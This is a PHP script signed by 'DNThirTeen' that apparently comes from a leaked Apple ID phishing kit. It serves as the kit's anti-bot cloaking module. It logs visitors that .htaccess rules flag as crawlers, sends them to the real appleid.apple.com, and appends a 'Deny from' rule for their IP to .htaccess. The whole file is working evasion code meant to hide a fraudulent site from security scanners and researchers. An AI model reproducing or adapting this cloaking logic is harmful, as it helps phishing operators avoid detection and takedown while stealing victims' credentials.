Logs Htaccess & Mutation blocker

1. <?php
2. /*
3. ▄▄▌ ▄▄▄ . ▄▄▄· ▄ •▄ ▄▄· ·▄▄▄▄ ▄▄▄ .
4. ██• ▀▄.▀·▐█ ▀█ █▌▄▌▪▐█ ▌▪▪ ██▪ ██ ▀▄.▀·
5. ██▪ ▐▀▀▪▄▄█▀▀█ ▐▀▀▄·██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄
6. ▐█▌▐▌▐█▄▄▌▐█ ▪▐▌▐█.█▌▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌
7. .▀▀▀ ▀▀▀ ▀ ▀ ·▀ ▀·▀▀▀ ▀█▄▀▪▀▀▀▀▀• ▀▀▀
8. FuCked By [!]DNThirTeen
9. https://www.facebook.com/groups/leakcode/
10. */
11. function DN13_init() {
12. if (DN13_check()) {
13. DN13_log();
14. DN13_exit();
15. }
16. }
17. function DN13_vars() {
18. $date = date('Y/m/d H:i:s');
19. $host = DN13_remote_host();
20. $referrer = DN13_http_referrer();
21. $agent = DN13_user_agent();
22. return array(
23. $date,
24. $host,
25. $referrer,
26. $agent
27. );
28. }
29. function DN13_check() {
30. $check = isset($_SERVER['REDIRECT_QUERY_STRING']) ? $_SERVER['REDIRECT_QUERY_STRING'] : '';
31. return ($check === 'log') ? true : false;
32. }
33. function save($file, $text, $type) {
34. $fp = fopen($file, $type);
35. fwrite($fp, $text);
36. fclose($fp);
37. }
38. function DN13_log() {
39. list($date, $host, $referrer, $agent) = DN13_vars();
40. $log = "===[DnThirTeen_IDS]===" . "\n";
41. $log .= "Date : " . $date . "\n";
42. $log .= "Address : " . $_SERVER['REMOTE_ADDR'] . "\n";
43. if ($host) {
44. $log .= "Host : " . $host . "\n";
45. }
46. if ($referrer) {
47. $log .= "Referrer : " . $referrer . "\n";
48. }
49. $log .= "User Agent : " . $agent . "\n\n";
50. $logz = preg_replace('/(\ )+/', ' ', $log);
51. save($_SERVER['DOCUMENT_ROOT'] . '/bot.log', $logz, "a");
52. }
53. function DN13_exit() {
54. header("Location: https://href.li/?https://appleid.apple.com/");
55. $file = $_SERVER['DOCUMENT_ROOT'] . "/.htaccess";
56. $fileget = @file_get_contents($file);
57. if (strpos($fileget, $_SERVER['REMOTE_ADDR']) !== false) {
58. } else {
59. $text = str_replace("#HateCrewDeathRoll", "#Bot Detected!\nDeny from " . $_SERVER['REMOTE_ADDR'] . "\n\n#HateCrewDeathRoll", $fileget);
60. return file_put_contents($file, $text);
61. }
62. exit();
63. }
64. function DN13_user_agent() {
65. $string = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
66. $match = isset($_SERVER['REDIRECT_DN13_USER_AGENT']) ? $_SERVER['REDIRECT_DN13_USER_AGENT'] : '';
67. return DN13_get_patterns($string, $match);
68. }
69. function DN13_remote_host() {
70. $string = '';
71. $match = isset($_SERVER['REDIRECT_DN13_REMOTE_HOST']) ? $_SERVER['REDIRECT_DN13_REMOTE_HOST'] : '';
72. return DN13_get_patterns($string, $match);
73. }
74. function DN13_http_referrer() {
75. $string = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
76. $match = isset($_SERVER['REDIRECT_DN13_HTTP_REFERRER']) ? $_SERVER['REDIRECT_DN13_HTTP_REFERRER'] : '';
77. return DN13_get_patterns($string, $match);
78. }
79. function DN13_get_patterns($string, $match) {
80. $patterns = explode('___', $match);
81. foreach ($patterns as $pattern) {
82. $string .= (!empty($pattern)) ? ' [' . $pattern . '] ' : '';
83. }
84. $string = preg_replace('/\s+/', ' ', $string);
85. return $string;
86. }
87. DN13_init();
88. ?>